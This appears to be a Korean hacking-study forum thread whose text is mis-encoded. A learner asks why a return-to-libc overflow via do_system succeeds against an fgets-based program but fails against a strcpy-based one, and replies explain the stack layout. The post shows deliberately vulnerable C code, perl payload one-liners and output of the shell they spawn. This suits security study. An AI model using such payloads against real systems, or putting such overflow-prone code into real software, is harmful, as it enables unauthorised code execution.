¸®´ª½º

 3923, 7/197 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   kumi123
   do_system ±Ã±ÝÇÑ °ÍÀÌ ÀÕ½À´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4329 [º¹»ç]


[dark_eyes@Fedora_1stFloor ~]$ cat a.c
#include <stdio.h>

int main(int argc, char* argv[])
{
        char buf[256];
        fgets(buf, 300, stdin);


        printf("%s \n", buf);

        return 0;
}

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x84\x07\x75\x00"';cat)| ./a

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA„u

id
uid=502(dark_eyes) gid=502(dark_eyes) groups=502(dark_eyes) context=user_u:system_r:unconfined_t


do_system rtl ¼º°ø ( + gets µµ )


ÇÏÁö¸¸,


[dark_eyes@Fedora_1stFloor ~]$ cat b.c
#include <stdio.h>
#include "dumpcode.h"
int main(int argc, char* argv[])
{
        char buf[256];

        strcpy(buf, argv[1]);

        printf("%s \n", buf);

        dumpcode(buf, 300);
        return 0;
}

strcpyÀÇ °æ¿ì


./b `perl -e 'print "A"x268, "\x84\x07\x75\x00"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA„u
./b: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA„u: File name too long


gets, fgets --> do_system rtl ¼º°ø

strcpy, strncpy --> ½ÇÆÐ

ÀÌÀ¯°¡ ¹»±î¿ä??



  Hit : 2906     Date : 2013/08/22 04:00



    
chlxogns92 Á¦ ȯ°æ¿¡¼± µÑ´Ù exploitÀÌ ¾ÈµÇ³×¿ä..
±Ùµ¥, ¿ø·¡ do_systemÀÇ ÀÎÀÚ´Â eax·Î µé¾î°¡´Â°Å´Ï±î, mainÇÔ¼ö¸¦ return 0À¸·Î Á¾·áÇϸé exploitÀÌ ¾ÈµÇ¾ß Á¤»ó¾Æ´Ñ°¡¿ä?
2013/08/23  
blueh4g Àû¾îÁֽŠ±Û¿¡ ´äÀÌ Àִ°Ű°¾Æ¿ä ^^; filename too long 2013/08/23  
kumi123 - chlxogns92 Æäµµ¶ó3¸¸ µÇ´õ±º¿ä.. ·¹µåÇÞ9 ~ Æäµµ¶ó2 (x) Æäµµ¶ó4 (x) ÇöÀç±îÁö´Â ÀÌ·¸½À´Ï´Ù. 2013/08/26  
kumi123 - blueh4g strpcyÀÇ °æ¿ì¿¡´Â, main¿¡ ebp ret argc argv ±¸Á¶¿¡¼­ do_systemÀÌ argv¸¦ ÂüÁ¶ Çϴ°űº¿ä..
gets() °è¿­Àº, ÀӽùöÆÛ¿¡ ÆÄÀÏÀ» ÀúÀåÇß´Ù°¡ º¹»ç¸¦ ÇÏ´Ï, argv ÀÚ¸®¿¡, ÆÄÀϸíÀÌ Âª¾ÆÁö´Â ±º¿ä.
¾Ë°í³ª¸é ÀÌ·¸°Ô °£´ÜÇÑ ÀÌÀ¯µ¥ ¤Ð¤Ð, °¨»çÇÕ´Ï´Ù. ^^ ÁÁÀº°Å ¶Ç ¹è¿ì°í °¡³×¿ä..
2013/08/26  
3803   ÁøÂ¥±Ã±ÝÇÑÁ¡!!¸®´ª½º ÄÄÇ»ÅÍ -³ëÆ®ºÏ ȣȯ°ü·Ã[4]     phonego
01/17 3012
3802   ¸¶¿îÆ® °ü·Ã Áú¹®ÀÌ¿ä[2]     nya
12/18 2844
3801   os x »ó¿¡¼­ ¹«¼±·£ °ü·Ã Áú¹®µå¸³´Ï´Ù.!![1]     awsws
11/26 3536
3800   ¸®´ª½º find¿Í grep ¸í·É¾î¿¡ ´ëÇØ Áú¹®µå¸³´Ï´Ù.[2]     shdac
11/25 3914
3799   ¸®´ª½º °øºÎÁßÀÎ ÇлýÀÔ´Ï´Ù.;;     eo4929
11/22 2725
3798   Æäµµ¶ó 16ÀÇ ¹«¼­¿ò ¤§¤§[2]     kumi123
10/13 4440
3797   ¿äÁò ¸®´ª½ºÀÇ vi·Î ÄÚµùÀ» Çؼ­ jsp À¥¼­¹ö ±¸ÃàÁßÀä... ¶óÀ̺귯¸® ¹®Á¦...[1]     sungwoodat
10/13 3171
3796   ¸®´ª½º¾È¿¡ ÇѱÛÀÌ ±úÁ®¼­ ³ª¿À´Âµ¥ ÇØ°á¹ýÀÌ ÀÖ³ª¿ä?[1]     dlghks44
09/17 2844
3795   Æ®·¹À̳Ê10°ú ·¹º§1À» ±ü ÈÄ ¿îµ¿Àå¿¡¼­ ·¹º§¾÷ÇÏ·Á°íÇϴµ¥ Àß ¾ÈµÇ¿ä!     sungwoodat
09/15 2620
3794   ¿ìºÐÅõ ½Ã½ºÅÛ¼³Á¤ ÆÄÀÏ ¾îµð¿¡ÀÖ³ª¿ä?[1]     kmc8724
09/01 3577
3793   ¸®´ª½º ÀÎÅÍ³Ý ¿¬°áÁ» ¤Ð¤Ð(±ÞÇØ¿ä ¤Ð¤Ð)[2]     xkdlrjxkdltm
08/25 3497
  do_system ±Ã±ÝÇÑ °ÍÀÌ ÀÕ½À´Ï´Ù.[4]     kumi123
08/22 2905
3791   ¸®¸ðÆ® ¾îÅýÿ¡, setuid ´Â ÇÊ¿ä¾ø³ª¿ä?[1]     kumi123
08/14 2784
3790   FTZ ¿¡¼­ ±ÇÇÑ ¹®Á¦·Î VI ÆíÁý±â »ç¿ëÀÌ ¾ÈµË´Ï´Ù[1]     fegg88
08/14 5181
3789   BackTrack¿¡¼­ ÅÍÄ¡Æеå¸ÔÅë Çö»ó...[1]     janeeyoon
08/11 3182
3788   ¾È³çÇϼ¼¿ë Àú´Â vmware 9.0¿¡ Æäµµ¶óÄھ´ª½º¸¦ »ç¿ëÁßÀÎ ´¾´¾Àë[2]     sungwoodat
07/30 2641
3787   vmware-linux-mysql°ú DBeaver ¿¬µ¿     flslel
07/29 3811
3786   VMware Linux Á¢¼Ó ¹®ÀÇ[1]     flslel
07/29 2881
3785   vmawre¿¡ telnetÀ¸·Î Á¢¼ÓÇϱâ..[3]     pppio
07/17 2448
3784   mount Áú¹®ÀÔ´Ï´Ù[1]     alexparkjw
07/16 2834
[1][2][3][4][5][6] 7 [8][9][10]..[197]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org